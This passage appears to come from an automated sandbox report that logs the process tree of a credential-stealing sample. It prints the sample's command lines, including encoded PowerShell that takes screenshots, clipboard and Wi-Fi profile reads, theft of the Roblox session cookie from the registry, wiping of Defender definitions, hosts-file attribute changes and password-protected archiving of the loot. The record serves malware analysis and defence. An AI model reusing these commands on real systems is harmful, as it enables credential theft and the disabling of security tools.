AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	03:22:11
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	03:22:11
Start date:	02/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff7b7570000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	03:22:11
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	03:22:11
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	03:22:11
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-Clipboard
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	03:22:11
Start date:	02/01/2025
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff6f3370000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	03:22:11
Start date:	02/01/2025
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profile
Imagebase:	0x7ff7d16d0000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	03:22:11
Start date:	02/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Imagebase:	0x7ff7403e0000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	03:22:12
Start date:	02/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff6b4290000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	62
Start time:	03:22:12
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	63
Start time:	03:22:12
Start date:	02/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase:	0x7ff7b5c80000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	64
Start time:	03:22:13
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	65
Start time:	03:22:13
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	66
Start time:	03:22:13
Start date:	02/01/2025
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib -r C:\Windows\System32\drivers\etc\hosts
Imagebase:	0x7ff6995b0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	67
Start time:	03:22:15
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline"
Imagebase:	0x7ff6b78b0000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	68
Start time:	03:22:15
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 7888, Parent PID: 7020

General

Target ID:	69
Start time:	03:22:15
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "getmac"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	70
Start time:	03:22:15
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	71
Start time:	03:22:15
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	72
Start time:	03:22:15
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	73
Start time:	03:22:15
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	03:22:15
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8ED.tmp" "c:\Users\user\AppData\Local\Temp\ppw2wipr\CSC774215641B8D46CBA5382B343227E316.TMP"
Imagebase:	0x7ff656630000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	75
Start time:	03:22:15
Start date:	02/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff7b7570000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	76
Start time:	03:22:15
Start date:	02/01/2025
Path:	C:\Windows\System32\getmac.exe
Wow64 process (32bit):	false
Commandline:	getmac
Imagebase:	0x7ff639da0000
File size:	90'112 bytes
MD5 hash:	7D4B72DFF5B8E98DD1351A401E402C33
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	77
Start time:	03:22:15
Start date:	02/01/2025
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +r C:\Windows\System32\drivers\etc\hosts
Imagebase:	0x7ff6995b0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	79
Start time:	03:22:16
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8160, Parent PID: 8152

General

Target ID:	80
Start time:	03:22:16
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	81
Start time:	03:22:16
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7292, Parent PID: 8180

General

Target ID:	82
Start time:	03:22:16
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	03:22:16
Start date:	02/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff7b7570000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	84
Start time:	03:22:17
Start date:	02/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff6b4290000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	85
Start time:	03:22:18
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7684, Parent PID: 7500

General

Target ID:	86
Start time:	03:22:18
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	87
Start time:	03:22:18
Start date:	02/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff7b7570000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	88
Start time:	03:22:18
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6468, Parent PID: 7300

General

Target ID:	89
Start time:	03:22:18
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	90
Start time:	03:22:18
Start date:	02/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff7b7570000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	91
Start time:	03:22:19
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7784, Parent PID: 7772

General

Target ID:	92
Start time:	03:22:19
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	93
Start time:	03:22:19
Start date:	02/01/2025
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff7b7570000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	94
Start time:	03:22:19
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	95
Start time:	03:22:19
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	96
Start time:	03:22:20
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	97
Start time:	03:22:21
Start date:	02/01/2025
Path:	C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Imagebase:	0x7ff7d7e50000
File size:	468'120 bytes
MD5 hash:	B3676839B2EE96983F9ED735CD044159
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	98
Start time:	03:22:21
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	99
Start time:	03:22:21
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	100
Start time:	03:22:21
Start date:	02/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	101
Start time:	03:22:29
Start date:	02/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *"
Imagebase:	0x7ff6729b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	102
Start time:	03:22:29
Start date:	02/01/2025
Path:	C:\Windows\System32\conhost.exe
